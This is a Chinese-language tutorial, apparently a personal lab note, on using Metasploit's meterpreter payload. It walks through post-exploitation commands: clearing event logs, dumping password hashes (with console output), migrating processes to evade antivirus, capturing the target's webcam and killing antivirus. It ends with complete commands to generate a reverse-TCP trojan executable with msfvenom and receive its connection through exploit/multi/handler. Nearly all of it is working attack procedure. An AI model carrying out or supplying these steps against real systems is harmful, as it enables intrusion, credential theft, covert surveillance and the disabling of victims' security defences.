远程控制软件
meterpreter
payload能使用meterpreter尽量用meterpreter。因为它真的很强大,小小的程序可以实现太多太多的功能了。
在meterpreter下面进行help:
可以看到有很多命令工具可以使用,非常方便!
下面调一些重要的功能介绍一下:
1. background:这个命令是将当前的session放到后台运行,可以在msf中继续其他渗透任务;
2. sessions:这个命令需要配合上面的background使用,该命令是将后台的会话打开,进行会话操作。
3. clearev:该命令是用来清除渗透的登录信息的,这个很有用。
4. hashdump:该命令是一个post模块,需要配合meterpreter使用,这个命令是用来获取目标系统的哈希值的,输入”run post/windows/gather/hashdump”
meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 1c4d83525a46e3e4670caa28fbf1a7fd...
[-] Meterpreter Exception: Rex::Post::Meterpreter::RequestError stdapi_registry_open_key: Operation failed: Access is denied.
[-] This script requires the use of a SYSTEM user context (hint: migrate into service process)
meterpreter >
- migrate:这个也是一个post模块。可以将meterpreter当前的进程移动到其他指定的进程中,这样做的好处是可以给meterpreter一个相对稳定的运行环境,同时可以很好的躲避杀软。
meterpreter > run post/windows/manage/migrate
[*] Running module against DX1XMSTMBBJR3FZ
[*] Current server process: notepad.exe (3292)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 6020
[+] Successfully migrated to process 6020
- search:这个命令是用来搜索系统中的文件的。
shell:这个命令是返回目标系统的shell命令行,在windows下返回cmd命令行,在unix下返回sh命令行。这个命令非常实用
webcam_list:列举摄像头。
webcam_snap:通过远程连接目标系统的摄像头。
run killav:关闭对方的杀软,其实关闭杀软也可以进入cmd中手动关闭。
当然meterpreter还有很多很多使用的命令,百度谷歌一大把,不过每一个meterpreter是不一样的,在windows下和linux下功能有差异。在运用中需要help具体查看。
首先根据自己的ip地址创建一个木马"msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.4.200 LPORT=55555 X > ko.exe"
然后在终端输入 “ msfconsole”
然后运行“use exploit/multi/handler” 打开handler 模块
然后运行命令行 “set PAYLOAD windows/meterpreter/reverse_tcp” 这和创建木马程序后面是一样的。
这里需要设置 LHOST 和LPORT
LHOST 是设置成自己虚拟机的IP地址 LPORT 是自己随意的端口
然后在输入“ exploit” 就会等到木马程序的响应了,这里是直接点击了木马程序
然后就可以进行一系列的操作了